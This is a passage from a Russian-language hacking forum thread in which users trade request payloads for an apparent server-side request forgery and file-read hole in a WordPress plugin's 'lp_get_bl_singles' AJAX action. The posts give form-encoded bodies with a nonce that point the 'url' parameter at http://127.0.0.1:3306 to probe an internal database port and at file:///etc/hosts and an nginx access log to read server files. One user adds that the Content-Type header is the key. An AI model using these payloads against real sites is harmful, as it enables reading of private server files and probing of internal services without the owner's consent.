HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.09.2016, 14:13
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Мне ничего кроме, сканирование, и чтение конфигов не приходит в голову

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//127.0.0.1:3306

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///etc/hosts
[/COLOR][/COLOR
надо конфиги смотреть, как вариант может получится прочитать конфиг на сайте, но не уверен, всё таки пхп как текст может не отдаться
 
Ответить с цитированием

  #12  
Старый 28.09.2016, 14:15
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///home/log/nginx/default.access.log[/COLOR][/COLOR] 
 
Ответить с цитированием

  #13  
Старый 28.09.2016, 14:16
androd
Новичок
Регистрация: 16.09.2016
Сообщений: 17
Провел на форуме:
5429

Репутация: 2
По умолчанию

Цитата:
Сообщение от BabaDook  

Мне ничего кроме, сканирование, и чтение конфигов не приходит в голову
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]lp_get_bl_singles

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//127.0.0.1:3306

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]req_offer_nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2a2388ca12

[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]///etc/hosts
[/COLOR][/COLOR
надо конфиги смотреть, как вариант может получится прочитать конфиг на сайте, но не уверен, всё таки пхп как текст может не отдаться
Content-Type: application/x-www-form-urlencoded

В этой строке кроется весь смысл....
 
Ответить с цитированием

  #14  
Старый 30.09.2016, 10:09
androd
Новичок
Регистрация: 16.09.2016
Сообщений: 17
Провел на форуме:
5429

Репутация: 2
По умолчанию

Вышло у кого что нибудь?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.